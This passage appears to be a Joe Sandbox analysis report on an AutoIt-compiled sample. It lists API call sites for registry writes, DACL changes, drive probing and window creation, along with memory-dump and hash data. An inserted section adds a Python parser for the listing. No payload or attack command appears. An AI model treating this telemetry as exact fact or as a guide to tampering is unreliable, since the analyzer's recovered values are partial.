• GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B33EE
• DeleteDC.GDI32(00000000), ref: 007B33F7
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007B3423
• SendMessageW.USER32(00000030,00000000,00000001), ref: 007B343A
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 007B347A
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007B348E
• SendMessageW.USER32(00000404,00000001,00000000), ref: 007B349F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 007B34D4
• GetStockObject.GDI32(00000011), ref: 007B34DF
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007B34EA
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007B34F4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 3a170d668080d8a63c6e7008cc961dfa6dfc85e0405ac3df5c7fe50cc3d5d551
• Instruction ID: 819a1d174e265015913b4f35d02c2f23e9cac871ea06c69e5ac41fb3ea5bb0b4
• Opcode Fuzzy Hash: 3a170d668080d8a63c6e7008cc961dfa6dfc85e0405ac3df5c7fe50cc3d5d551
• Instruction Fuzzy Hash: 45B15271A40205AFEB24DFA8CC49FAE7BB9FB48710F018119F915E72A1D7B8AD40CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001), ref: 007A5532
• GetDriveTypeW.KERNEL32(?,007CDC30,?,\\.\,007CDCD0), ref: 007A560F
• SetErrorMode.KERNEL32(00000000,007CDC30,?,\\.\,007CDCD0), ref: 007A577B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 80103d8e60054201a11e8b82a5de75ab4446660ff063f4e859e2014b90ad9461
• Instruction ID: 5c8831fc1ba0ef5cf5ae1f410faddd376d2d67b9b732d163330b5447872f0dd4
• Opcode Fuzzy Hash: 80103d8e60054201a11e8b82a5de75ab4446660ff063f4e859e2014b90ad9461
• Instruction Fuzzy Hash: 1561D170B04A09DBC72CDF24C995D7873B1EF96760B648229E506AB392C73DDD01DB52
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32(?), ref: 007C1BC4
• GetDesktopWindow.USER32 ref: 007C1BD9
• GetWindowRect.USER32(00000000), ref: 007C1BE0
• GetWindowLongW.USER32(?,000000F0), ref: 007C1C35
• DestroyWindow.USER32(?), ref: 007C1C55
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C1C89
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C1CA7
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007C1CB9
• SendMessageW.USER32(00000000,00000421,?,?), ref: 007C1CCE
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 007C1CE1
• IsWindowVisible.USER32(00000000), ref: 007C1D3D
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007C1D58
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007C1D6C
• GetWindowRect.USER32(00000000,?), ref: 007C1D84
                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 007C1DAA
                                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 007C1DC4
                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 007C1DDB
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 007C1E46
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                                                          • Opcode ID: 55260d150edf0a81bf96809905687de7c1e365c755e6a517b392158b5e6c4d89
                                                                                                                                                                                          • Instruction ID: e15162ca13e31d4f7b15073e0d5c9e4543e813ba820328801d983f0986ce302e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55260d150edf0a81bf96809905687de7c1e365c755e6a517b392158b5e6c4d89
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9B15A71604301AFD714DF64C988F6ABBE5EF85350F40892CF599AB292D735EC44CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharUpperBuffW.USER32(?,?), ref: 007C0D81
• _wcslen.LIBCMT ref: 007C0DBB
• _wcslen.LIBCMT ref: 007C0E25
• _wcslen.LIBCMT ref: 007C0E8D
• _wcslen.LIBCMT ref: 007C0F11
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007C0F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C0FA0
  • Part of subcall function 0074FD52: _wcslen.LIBCMT ref: 0074FD5D
  • Part of subcall function 00792B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00792BA5
  • Part of subcall function 00792B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00792BD7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: e979e80c33094add8818a3063f5b70530baafc9b634686e347dcf9ba645f4a12
• Instruction ID: c8d30bd515c2e687c4d184542990b78e9eefd0fdc6ec6bec08b7fc84072bd0c9
• Opcode Fuzzy Hash: e979e80c33094add8818a3063f5b70530baafc9b634686e347dcf9ba645f4a12
• Instruction Fuzzy Hash: 8FE1AD31208241CFCB14EF24C551E6AB3E6BF85314F55496CF8969B3A2DB38ED45CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007325F8
• GetSystemMetrics.USER32(00000007), ref: 00732600
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0073262B
• GetSystemMetrics.USER32(00000008), ref: 00732633
• GetSystemMetrics.USER32(00000004), ref: 00732658
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00732675
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00732685
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007326B8
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007326CC
• GetClientRect.USER32(00000000,000000FF), ref: 007326EA
• GetStockObject.GDI32(00000011), ref: 00732706
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00732711
  • Part of subcall function 007319CD: GetCursorPos.USER32(?), ref: 007319E1
  • Part of subcall function 007319CD: ScreenToClient.USER32(00000000,?), ref: 007319FE
  • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000001), ref: 00731A23
  • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000002), ref: 00731A3D
• SetTimer.USER32(00000000,00000000,00000028,0073199C), ref: 00732738
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 4d87a91b3cd7c6c61e23844c7e670f16abcf31d3f0044cb4e3404c92a1d8895c
• Instruction ID: 8c3598925e54f18462126c64f608553933530eb686a8027a9fc9b4405902bf92
• Opcode Fuzzy Hash: 4d87a91b3cd7c6c61e23844c7e670f16abcf31d3f0044cb4e3404c92a1d8895c
• Instruction Fuzzy Hash: 73B16B31A002099FDF14DFA8DC49FAE7BB4FB48314F108229FA19A7291D7B8A951CF55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00791A60
                                                                                                                                                                                            • Part of subcall function 00791A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A6C
                                                                                                                                                                                            • Part of subcall function 00791A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A7B
                                                                                                                                                                                            • Part of subcall function 00791A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A82
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00791A99
                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00791741
                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00791775
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0079178C
                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 007917C6
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007917E2
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 007917F9
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00791801
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00791808
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00791829
                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00791830
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079185F
                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00791881
                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00791893
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007918BA
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918C1
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007918CA
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918D1
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007918DA
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918E1
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007918ED
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918F4
                                                                                                                                                                                            • Part of subcall function 00791ADF: GetProcessHeap.KERNEL32(00000008,007914FD,?,00000000,?,007914FD,?), ref: 00791AED
                                                                                                                                                                                            • Part of subcall function 00791ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007914FD,?), ref: 00791AF4
                                                                                                                                                                                            • Part of subcall function 00791ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007914FD,?), ref: 00791B03
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                          • Opcode ID: c64b1fcc60c75819056766429b2b30a5bf05a8b061c431bbe28fc46cd172ce64
                                                                                                                                                                                          • Instruction ID: 62e730e2d4d4214d9252b2cf9cb2c163a12bee11560e24db5ec6d2eca966e490
                                                                                                                                                                                          • Opcode Fuzzy Hash: c64b1fcc60c75819056766429b2b30a5bf05a8b061c431bbe28fc46cd172ce64
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62714EB2D0020AAFDF20DFA5EC49FAEBBB9BF04310F558129E915A6190D7399D15CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BCF1D
                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,007CDCD0,00000000,?,00000000,?,?), ref: 007BCFA4
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 007BD004
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BD054
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BD0CF
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 007BD112
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 007BD221
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 007BD2AD
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 007BD2E1
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007BD2EE
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 007BD3C0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                          • API String ID: 9721498-966354055
                                                                                                                                                                                          • Opcode ID: f727eda500c25cf40111dde45c03a983cf9ecd3fd8b2460d9031f329556f98f8
                                                                                                                                                                                          • Instruction ID: 41a9b47938c540a9c2a57196e064c11c6ac8e98f985b1e96c496ce8e5824eca2
                                                                                                                                                                                          • Opcode Fuzzy Hash: f727eda500c25cf40111dde45c03a983cf9ecd3fd8b2460d9031f329556f98f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2123875604201DFD724DF14C885B6AB7E5BF88714F04889CF99A9B3A2DB39ED41CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
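The call-site lines above (RegConnectRegistryW, RegCreateKeyExW, three RegSetValueExW calls with differing dwType constants, RegCloseKey) are enough to recover what kind of registry write each site performs without opening the dump. The following parser is an added example and not part of the Joe Sandbox report or its tooling: it reads the listing's own line format, turns each call into a record, groups direct calls by module, and decodes the dwType and cbData arguments of every RegSetValueExW site using the value-type constants from winnt.h (REG_SZ=1, REG_EXPAND_SZ=2, REG_BINARY=3, REG_DWORD=4, REG_MULTI_SZ=7, REG_QWORD=11). The sample input is the record above copied verbatim plus one "Part of subcall function" line from the earlier record, embedded as a constructed string; it is assumed that a `?` argument denotes a value the analyzer could not resolve and that the 6th argument is cbData, as in the documented prototype.

```python
import re
from collections import defaultdict

# Constructed sample input: the call-site lines of the registry-writing
# function from the listing above, copied verbatim, plus one "Part of
# subcall function" line from the earlier record to exercise that shape.
SAMPLE = """\
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BCF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,007CDCD0,00000000,?,00000000,?,?), ref: 007BCFA4
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 007BD004
• _wcslen.LIBCMT ref: 007BD054
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 007BD112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 007BD221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 007BD2AD
• RegCloseKey.ADVAPI32(?), ref: 007BD2E1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 007BD3C0
  • Part of subcall function 00791ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007914FD,?), ref: 00791AF4
"""

# Three line shapes occur in the report: a call with an argument list, a CRT
# call without one ("_wcslen.LIBCMT ref: ..."), and either of those prefixed
# with "Part of subcall function XXXXXXXX:". One pattern covers all three.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Registry value types from winnt.h, used to decode RegSetValueExW's dwType.
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
             7: "REG_MULTI_SZ", 11: "REG_QWORD"}
# Fixed-size types whose cbData must match (assumption: cbData, when the
# analyzer resolved it, is the 6th argument as in the documented prototype).
FIXED_SIZE = {4: 4, 11: 8}


def parse_calls(text):
    """Turn listing lines into dicts. A '?' argument (assumed to mean a value
    the analyzer could not resolve) becomes None; hex values become ints."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw else [None if a == "?" else int(a, 16) for a in raw.split(",")]
        calls.append({
            "api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def api_summary(calls):
    """APIs the function calls directly, grouped by module (subcalls excluded)."""
    by_mod = defaultdict(set)
    for c in calls:
        if c["subcall"] is None:
            by_mod[c["module"]].add(c["api"])
    return {mod: sorted(apis) for mod, apis in by_mod.items()}


def decode_reg_writes(calls):
    """Recover value type and size for each RegSetValueExW call site.
    Prototype: RegSetValueExW(hKey, lpValueName, Reserved, dwType, lpData, cbData)."""
    writes = []
    for c in calls:
        if c["api"] != "RegSetValueExW" or len(c["args"]) < 6:
            continue
        dwtype, cbdata = c["args"][3], c["args"][5]
        if dwtype is None:
            name = "unresolved"
        else:
            name = REG_TYPES.get(dwtype, "unknown(%d)" % dwtype)
        writes.append({"ref": "%08X" % c["ref"], "type": name, "size": cbdata})
    return writes


def size_anomalies(calls):
    """Flag fixed-size types written with a cbData that does not match; a
    mismatch usually means the argument recovery, not the sample, is off."""
    bad = []
    for c in calls:
        if c["api"] != "RegSetValueExW" or len(c["args"]) < 6:
            continue
        dwtype, cbdata = c["args"][3], c["args"][5]
        if dwtype in FIXED_SIZE and cbdata is not None and cbdata != FIXED_SIZE[dwtype]:
            bad.append("%08X" % c["ref"])
    return bad


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    print(api_summary(parsed))
    for w in decode_reg_writes(parsed):
        print(w)
    print("size anomalies:", size_anomalies(parsed))
```

On the sample the four RegSetValueExW sites decode to REG_SZ, REG_MULTI_SZ, REG_QWORD (cbData 8, which is the size the type requires) and REG_BINARY, matching the REG_* strings the report lists for this function; the size check is the one sanity test worth keeping when arguments come from static call-site recovery rather than a live trace.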

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007C1462
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C149D
                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C14F0
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C1526
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C15A2
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C161D
                                                                                                                                                                                            • Part of subcall function 0074FD52: _wcslen.LIBCMT ref: 0074FD5D
                                                                                                                                                                                            • Part of subcall function 00793535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00793547
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                                          • Opcode ID: 2cfc2ce59ac19282091e4e1842c9357cb7f5917a8b10325c91e2fd6e946a743f
                                                                                                                                                                                          • Instruction ID: 04ea90e47e21a3fc97b2730a5e1b61839a76585ab5ffc32d4965e4ddd9e54830
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cfc2ce59ac19282091e4e1842c9357cb7f5917a8b10325c91e2fd6e946a743f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12E1AD71608341CFCB14DF24C450A6AB7E2BF99314F55896CF8969B3A2DB38ED45CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                                          • Opcode ID: 59175e9004c60af368cef844b582283675ebe159f8230e9f27bec0f2623d2310
                                                                                                                                                                                          • Instruction ID: d5f30400c370fe507bee9d923b1d15faea7601b142cfc078290b179f23cde600
                                                                                                                                                                                          • Opcode Fuzzy Hash: 59175e9004c60af368cef844b582283675ebe159f8230e9f27bec0f2623d2310
                                                                                                                                                                                          • Instruction Fuzzy Hash: D471D33260016A8BCB309F78C9547FA33A1AF60798B250128FC569B295FA3DDD5587A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8DB5
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8DC9
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8DEC
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8E0F
                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007C8E4D
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007C6691), ref: 007C8EA9
                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007C8EE2
                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007C8F25
                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007C8F5C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 007C8F68
                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007C8F78
                                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,007C6691), ref: 007C8F87
                                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007C8FA4
                                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007C8FB0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                                          • Opcode ID: ec8a9f72c71bc6e6e0e1e579a80d94de4c2ec250eafb146a58e3fd3d5c0d32d9
                                                                                                                                                                                          • Instruction ID: 66fe66295a21046f8a710169600ae03748c4f10d5160ffd0f037f274a0b7b067
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec8a9f72c71bc6e6e0e1e579a80d94de4c2ec250eafb146a58e3fd3d5c0d32d9
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE61C071A00619FAEB64DF64CC45FBE77A8AF08B11F10811EF915D61D1DBB8AD90CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 007A493D
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A4948
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A499F
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A49DD
                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 007A4A1B
                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A4A63
